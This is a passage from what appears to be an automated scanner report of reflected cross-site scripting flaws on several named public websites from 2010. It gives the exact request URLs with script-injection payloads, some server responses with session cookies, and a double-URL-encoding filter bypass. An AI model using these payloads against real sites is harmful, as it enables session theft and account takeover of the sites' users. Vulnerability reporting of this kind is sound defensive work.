GET /recaptcha_iframe.shtml?disp_type=wide&content_type=475f9"><script>alert(1)</script>a32fa17e26a&content_type_id=6007620&comment_name= HTTP/1.1 Host: www.associatedcontent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D;
Response
HTTP/1.0 200 OK Date: Sun, 14 Nov 2010 23:25:43 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Content-Length: 249 Connection: close Content-Type: text/html
The value of the content_type_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3df44"><script>alert(1)</script>2fc7b9358b was submitted in the content_type_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /recaptcha_iframe.shtml?disp_type=wide&content_type=article&content_type_id=3df44"><script>alert(1)</script>2fc7b9358b&comment_name= HTTP/1.1 Host: www.associatedcontent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D;
Response
HTTP/1.0 200 OK Date: Sun, 14 Nov 2010 23:25:46 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Content-Length: 248 Connection: close Content-Type: text/html
The value of the disp_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9079"><script>alert(1)</script>daecc58a6e8 was submitted in the disp_type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /recaptcha_iframe.shtml?disp_type=f9079"><script>alert(1)</script>daecc58a6e8&content_type=article&content_type_id=6007620&comment_name= HTTP/1.1 Host: www.associatedcontent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D;
Response
HTTP/1.0 200 OK Date: Sun, 14 Nov 2010 23:25:39 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Content-Length: 252 Connection: close Content-Type: text/html
The value of the CC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8acd"%3balert(1)//7612e955241 was submitted in the CC parameter. This input was echoed as d8acd";alert(1)//7612e955241 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the CC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91221"style%3d"x%3aexpression(alert(1))"8b6472a2826 was submitted in the CC parameter. This input was echoed as 91221"style="x:expression(alert(1))"8b6472a2826 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the PC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 807f5"%3balert(1)//d5bb3c2d898 was submitted in the PC parameter. This input was echoed as 807f5";alert(1)//d5bb3c2d898 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c04b"style%3d"x%3aexpression(alert(1))"a7b71ef0f59 was submitted in the PC parameter. This input was echoed as 4c04b"style="x:expression(alert(1))"a7b71ef0f59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
3.286. http://www.godaddy.com/Hosting/Legacy.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/Hosting/Legacy.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eed19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ad57768b1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eed19"><script>alert(1)</script>7ad57768b1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Hosting/Legacy.aspx?eed19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ad57768b1e=1 HTTP/1.1 Host: www.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:28:56 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=pf3l0lfa5o2nzenfz3ldab45; path=/; HttpOnly Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:28:56 GMT; path=/ Set-Cookie: adc1=US; domain=godaddy.com; path=/ Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:28:56 GMT; path=/ Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:28:56 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/web-hosting.aspx&server=CORPWEB185&status=200 OK&querystring=eed19%22%3e%3cscript%3ealert(1)%3c%2fscript%3e7ad57768b1e=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=&referringdomain=; domain=godaddy.com; path=/ Set-Cookie: BlueLithium=vaihmdgcxgvgbbodxicfkjgeycogljve; domain=godaddy.com; path=/ Set-Cookie: GoogleADServicesgoogleadwords=vaihmdgcxgvgbbodxicfkjgeycogljve; domain=godaddy.com; expires=Sat, 14-Nov-2020 23:28:56 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 327373
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.287. http://www.godaddy.com/email/email-hosting.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/email/email-hosting.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc22e"onerror%3d"alert(1)"8e83204b2bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc22e"onerror="alert(1)"8e83204b2bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /email/email-hosting.aspx?fc22e"onerror%3d"alert(1)"8e83204b2bd=1 HTTP/1.1 Host: www.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:30:57 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=iife4duravuindjfl2rwhir5; path=/; HttpOnly Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:30:57 GMT; path=/ Set-Cookie: adc1=US; domain=godaddy.com; path=/ Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:30:57 GMT; path=/ Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:30:57 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/email/email-hosting.aspx&server=CORPWEB185&status=200 OK&querystring=fc22e%22onerror%3d%22alert(1)%228e83204b2bd=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=&referringdomain=; domain=godaddy.com; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 161537
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.288. http://www.godaddy.com/hosting/web-hosting.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/hosting/web-hosting.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c780"onerror%3d"alert(1)"79da83a095f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c780"onerror="alert(1)"79da83a095f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /hosting/web-hosting.aspx?1c780"onerror%3d"alert(1)"79da83a095f=1 HTTP/1.1 Host: www.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:29:02 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=y13o43be2pe3s33c1weiye55; path=/; HttpOnly Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:29:02 GMT; path=/ Set-Cookie: adc1=US; domain=godaddy.com; path=/ Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:29:02 GMT; path=/ Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:29:02 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/web-hosting.aspx&server=CORPWEB185&status=200 OK&querystring=1c780%22onerror%3d%22alert(1)%2279da83a095f=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=&referringdomain=; domain=godaddy.com; path=/ Set-Cookie: BlueLithium=eeobbbphjipabdxjydnbcbcijarbvghj; domain=godaddy.com; path=/ Set-Cookie: GoogleADServicesgoogleadwords=eeobbbphjipabdxjydnbcbcijarbvghj; domain=godaddy.com; expires=Sat, 14-Nov-2020 23:29:02 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 327331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.289. http://www.godaddy.com/hosting/website-builder.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/hosting/website-builder.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bd67"onerror%3d"alert(1)"453233e7a72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4bd67"onerror="alert(1)"453233e7a72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /hosting/website-builder.aspx?4bd67"onerror%3d"alert(1)"453233e7a72=1 HTTP/1.1 Host: www.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:28:41 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=zakbmwnurpis3vin1meaol55; path=/; HttpOnly Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:28:41 GMT; path=/ Set-Cookie: adc1=US; domain=godaddy.com; path=/ Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:28:41 GMT; path=/ Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:28:41 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=CORPWEB185&status=200 OK&querystring=4bd67%22onerror%3d%22alert(1)%22453233e7a72=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=&referringdomain=; domain=godaddy.com; path=/ Set-Cookie: BlueLithium=niebualizeucbhrdufjfnfndvcecueyj; domain=godaddy.com; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 225073
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.290. http://www.godaddy.com/ssl/ssl-certificates.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/ssl/ssl-certificates.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32c42"onerror%3d"alert(1)"6f7b69a8f88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32c42"onerror="alert(1)"6f7b69a8f88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ssl/ssl-certificates.aspx?32c42"onerror%3d"alert(1)"6f7b69a8f88=1 HTTP/1.1 Host: www.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:30:04 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=5wsjlnvcapq4vs45nj3h2b45; path=/; HttpOnly Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:30:04 GMT; path=/ Set-Cookie: adc1=US; domain=godaddy.com; path=/ Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:30:04 GMT; path=/ Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:30:04 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=CORPWEB185&status=200 OK&querystring=32c42%22onerror%3d%22alert(1)%226f7b69a8f88=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=&referringdomain=; domain=godaddy.com; path=/ Set-Cookie: GoogleADServicesgooglessl=aanfjdxabhdayjjbyfvjgcajcffbqcmf; domain=godaddy.com; expires=Sat, 14-Nov-2020 23:30:04 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 158736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.291. https://www.godaddy.com/gdshop/email.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.godaddy.com
Path:
/gdshop/email.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d3df"onerror%3d"alert(1)"9525c6cd90d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7d3df"onerror="alert(1)"9525c6cd90d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /gdshop/email.asp?7d3df"onerror%3d"alert(1)"9525c6cd90d=1 HTTP/1.1 Host: www.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:50:19 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=5m2zzn55zxop1snh3zfrxnnu; path=/; HttpOnly Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:50:18 GMT; path=/ Set-Cookie: adc1=US; domain=godaddy.com; path=/ Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:50:18 GMT; path=/ Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:50:18 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/email/email-hosting.aspx&server=CORPWEB185&status=200 OK&querystring=7d3df%22onerror%3d%22alert(1)%229525c6cd90d=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=&referringdomain=; domain=godaddy.com; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 162260
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.292. https://www.godaddy.com/gdshop/hosting/hosting_build_website.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.godaddy.com
Path:
/gdshop/hosting/hosting_build_website.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25f27"onerror%3d"alert(1)"81e14d9081f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25f27"onerror="alert(1)"81e14d9081f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /gdshop/hosting/hosting_build_website.asp?25f27"onerror%3d"alert(1)"81e14d9081f=1 HTTP/1.1 Host: www.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:34:49 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ogtbab554roamt45wfztyo45; path=/; HttpOnly Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:34:49 GMT; path=/ Set-Cookie: adc1=US; domain=godaddy.com; path=/ Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:34:49 GMT; path=/ Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:34:49 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=CORPWEB185&status=200 OK&querystring=25f27%22onerror%3d%22alert(1)%2281e14d9081f=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=&referringdomain=; domain=godaddy.com; path=/ Set-Cookie: BlueLithium=hjxbrjqdmdkbbjsgefmhwenenebejjlg; domain=godaddy.com; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 225951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.293. https://www.godaddy.com/gdshop/ssl/ssl.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.godaddy.com
Path:
/gdshop/ssl/ssl.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84276"onerror%3d"alert(1)"31ec267e898 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84276"onerror="alert(1)"31ec267e898 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /gdshop/ssl/ssl.asp?84276"onerror%3d"alert(1)"31ec267e898=1 HTTP/1.1 Host: www.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:41:38 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ynqgouenysfozx45awt02hqx; path=/; HttpOnly Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:41:38 GMT; path=/ Set-Cookie: adc1=US; domain=godaddy.com; path=/ Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:41:38 GMT; path=/ Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:41:38 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=CORPWEB185&status=200 OK&querystring=84276%22onerror%3d%22alert(1)%2231ec267e898=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=&referringdomain=; domain=godaddy.com; path=/ Set-Cookie: GoogleADServicesgooglessl=fcsjqakgtjpiaitjaiyjxijgiileaiqd; domain=godaddy.com; expires=Sat, 14-Nov-2020 23:41:38 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 159453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.294. http://www.hotelsoup.com/hotel.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.hotelsoup.com
Path:
/hotel.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cf4f'><script>alert(1)</script>f12adfdb8fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hotel.php?4cf4f'><script>alert(1)</script>f12adfdb8fc=1 HTTP/1.1 Host: www.hotelsoup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.295. http://www.hotelsoup.com/hotel.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.hotelsoup.com
Path:
/hotel.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2264"><script>alert(1)</script>7091e9fcbb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hotel.php?a2264"><script>alert(1)</script>7091e9fcbb8=1 HTTP/1.1 Host: www.hotelsoup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload c0edc<script>alert(1)</script>db5f1a8ae2b was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /hotel.php?query=hotel+san+franciscoc0edc<script>alert(1)</script>db5f1a8ae2b&hsid=hs-4cc8974059987&hss=adwc&&client=ca-dp-godaddy2_xml HTTP/1.1 Host: www.hotelsoup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f427"><script>alert(1)</script>bcc6b546b72 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /hotel.php?query=hotel+san+francisco8f427"><script>alert(1)</script>bcc6b546b72&hsid=hs-4cc8974059987&hss=adwc&&client=ca-dp-godaddy2_xml HTTP/1.1 Host: www.hotelsoup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1db8d"><script>alert(1)</script>7468974be37 was submitted in the width parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload f07b5<script>alert(1)</script>7962c56bc63 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the n request parameter is copied into the HTML document as plain text between tags. The payload 1f326<script>alert(1)</script>42f179eed7a was submitted in the n parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the s request parameter is copied into the HTML document as plain text between tags. The payload a6ad2<script>alert(1)</script>0e367d1dc82 was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
